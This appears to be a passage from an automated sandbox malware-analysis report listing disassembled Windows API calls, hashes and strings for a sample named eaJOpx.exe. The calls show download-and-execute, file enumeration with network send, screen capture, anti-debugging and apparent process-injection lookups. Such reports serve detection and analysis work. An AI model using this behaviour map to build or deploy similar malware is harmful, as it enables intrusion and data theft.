                                                    • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID: SETTINGS
                                                    • API String ID: 3473537107-594951305
                                                    • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                    • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                                                    • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                    • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00407A91
                                                    • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstH_prologNext
                                                    • String ID:
                                                    • API String ID: 1157919129-0
                                                    • Opcode ID: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                    • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                    • Opcode Fuzzy Hash: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                    • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                    APIs
                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DownloadExecuteFileShell
                                                    • String ID: C:\Users\user\AppData\Roaming\eaJOpx.exe$open
                                                    • API String ID: 2825088817-4151513542
                                                    • Opcode ID: 7e85e9708a69cc66c26a7a88b77871784f210427ffc5903fb5556e7e05261e37
                                                    • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                    • Opcode Fuzzy Hash: 7e85e9708a69cc66c26a7a88b77871784f210427ffc5903fb5556e7e05261e37
                                                    • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorInfoLastLocale$_free$_abort
                                                    • String ID: Zb1Y/
                                                    • API String ID: 2829624132-3232713500
                                                    • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                    • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                    • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                    • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                      • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFind$FirstNextsend
                                                    • String ID: x@G$x@G
                                                    • API String ID: 4113138495-3390264752
                                                    • Opcode ID: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                    • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                    • Opcode Fuzzy Hash: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                    • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                      • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                      • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                      • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseCreateInfoParametersSystemValue
                                                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                    • API String ID: 4127273184-3576401099
                                                    • Opcode ID: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                    • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                    • Opcode Fuzzy Hash: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                    • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A765
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A76F
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A77C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3906539128-3232713500
                                                    • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                    • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                    • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                    • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00408DAC
                                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileFind$FirstH_prologNext
                                                    • String ID:
                                                    • API String ID: 301083792-0
                                                    • Opcode ID: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                    • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                    • Opcode Fuzzy Hash: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                    • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$Zb1Y/
                                                    • API String ID: 0-2556323486
                                                    • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                    • Instruction ID: 7b9f70a4ed7410ef06f95e01b7d5f23a490d2b0eff2bca8ad8bf22ff3bb6f1ff
                                                    • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                    • Instruction Fuzzy Hash: 65310371C00209AFEB249E79CC84EEB7BBDDB86318F1501AEF91997351E6389E418B54
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID: GetLocaleInfoEx$Zb1Y/
                                                    • API String ID: 2299586839-3498089611
                                                    • Opcode ID: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                    • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                    • Opcode Fuzzy Hash: f5e2153e4984e43413bf11c07bd0b6bdf0abc05710bcbde66c151b87e472c2d2
                                                    • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                    APIs
                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                    • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                    • String ID:
                                                    • API String ID: 1815803762-0
                                                    • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                    • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                    • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                    • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$_free$InfoLocale_abort
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1663032902-3232713500
                                                    • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                    • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                    • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                    • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                    APIs
                                                      • Part of subcall function 00444ADC: EnterCriticalSection.KERNEL32(?,?,0044226B,00000000,0046DAC0,0000000C,00442226,?,?,?,00448749,?,?,00446F84,00000001,00000364), ref: 00444AEB
                                                    • EnumSystemLocalesW.KERNEL32(00447078,00000001,0046DC48,0000000C), ref: 004470F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1272433827-3232713500
                                                    • Opcode ID: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                    • Instruction ID: 950dafe7846e52006e44ffeb80a247b0be4aa16561b4e62d8165e672452c2196
                                                    • Opcode Fuzzy Hash: d6288f75061eb918828b1d19c4fc55d59e88b5aa2809351af96f283ddca40410
                                                    • Instruction Fuzzy Hash: 86F04932A50200DFE714EF68EC06B5D37B0EB44729F10856AF414DB2A1CBB88941CB49
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • EnumSystemLocalesW.KERNEL32(00450E7A,00000001,00000000,?,00443CFC,?,004514A7,00000000,?,?,?), ref: 00450DC4
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                    • String ID:
                                                    • API String ID: 1084509184-0
                                                    • Opcode ID: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                    • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                    • Opcode Fuzzy Hash: d99188ff6ee540699b39099ab73947b80cac50bc1a66931b919ed4136ee52686
                                                    • Instruction Fuzzy Hash: 0311063A2003055FDB189F79C8916BAB7A2FF8035AB14442DE94647741D375B846C744
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451098,00000000,00000000,?), ref: 00451326
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale_abort_free
                                                    • String ID:
                                                    • API String ID: 2692324296-0
                                                    • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                    • Instruction ID: 4a7b2d8eee9e9bf1806ba2ca5426cfe5ee0bfa5d6ba01d855eb6d5500f899482
                                                    • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                    • Instruction Fuzzy Hash: F8F07D32900211BBEF245B25CC16BFB7758EF40316F14046BEC05A3651EA78FD45C6D8
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • EnumSystemLocalesW.KERNEL32(004510CA,00000001,?,?,00443CFC,?,0045146B,00443CFC,?,?,?,?,?,00443CFC,?,?), ref: 00450E39
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                    • String ID:
                                                    • API String ID: 1084509184-0
                                                    • Opcode ID: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                    • Instruction ID: d200f6f198282f27697ffa375fc43d462b62b5ac62e6196a1a4f0d3fe89d4a8d
                                                    • Opcode Fuzzy Hash: abe90ec02cc7fcff172fc53912aae85a85386d507e0dedff0ae7f670b1f5ef6c
                                                    • Instruction Fuzzy Hash: 6FF0223A2003055FDB145F3ADC92A7B7BD1EF81329B25883EFD458B681D2759C428604
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                    • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                    • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                    • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                    APIs
                                                      • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                      • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                      • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                      • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                    • EnumSystemLocalesW.KERNEL32(00450C5E,00000001,?,?,?,004514C9,00443CFC,?,?,?,?,?,00443CFC,?,?,?), ref: 00450D3E
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                    • String ID:
                                                    • API String ID: 1084509184-0
                                                    • Opcode ID: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                    • Instruction ID: 864766c87332746f2956c71e591744750bfae77d4df159f99123e8476a767ca9
                                                    • Opcode Fuzzy Hash: 7c1b61f81489e07a7731e6ad51784a2f83adb3e1c219b5a3241bb94100a853af
                                                    • Instruction Fuzzy Hash: 94F05C3D30020557CB159F75D8057667F90EFC2711B164059FE098B242C675D846C754
                                                    APIs
                                                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                    • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                    • Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
                                                    • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: recv
                                                    • String ID:
                                                    • API String ID: 1507349165-0
                                                    • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                    • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                    • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                    • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                    APIs
                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FC9
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00417FD4
                                                      • Part of subcall function 00418462: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418492
                                                    • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418055
                                                    • DeleteDC.GDI32(?), ref: 0041806D
                                                    • DeleteDC.GDI32(00000000), ref: 00418070
                                                    • SelectObject.GDI32(00000000,00000000), ref: 0041807B
                                                    • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 004180A3
                                                    • GetIconInfo.USER32(?,?), ref: 004180DB
                                                    • DeleteObject.GDI32(?), ref: 0041810A
                                                    • DeleteObject.GDI32(?), ref: 00418117
                                                    • DrawIcon.USER32(00000000,?,?,?), ref: 00418124
                                                    • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418154
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 00418183
                                                    • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181CC
                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181EF
                                                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00418258
                                                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041827B
                                                    • DeleteDC.GDI32(?), ref: 0041828F
                                                    • DeleteDC.GDI32(00000000), ref: 00418292
                                                    • DeleteObject.GDI32(00000000), ref: 00418295
                                                    • GlobalFree.KERNEL32(00CC0020), ref: 004182A0
                                                    • DeleteObject.GDI32(00000000), ref: 00418354
                                                    • GlobalFree.KERNEL32(?), ref: 0041835B
                                                    • DeleteDC.GDI32(?), ref: 0041836B
                                                    • DeleteDC.GDI32(00000000), ref: 00418376
                                                    • DeleteDC.GDI32(?), ref: 004183A8
                                                    • DeleteDC.GDI32(00000000), ref: 004183AB
                                                    • DeleteObject.GDI32(?), ref: 004183B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                    • String ID: DISPLAY
                                                    • API String ID: 1765752176-865373369
                                                    • Opcode ID: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                    • Instruction ID: 6b2ada92df8522405a2cca839f58df11a8e30ba3d3d74bda048dad66fb1953bf
                                                    • Opcode Fuzzy Hash: e7f0c94ea3cf5daa80797fed7648512a6613a050bfb8d1c4bcfe1f6bef1f1438
                                                    • Instruction Fuzzy Hash: 39C17C71508344AFD3209F25DC44BABBBE9FF88751F04092EF989932A1DB34E945CB5A
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                    • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                    • GetProcAddress.KERNEL32(00000000), ref: 004172A3
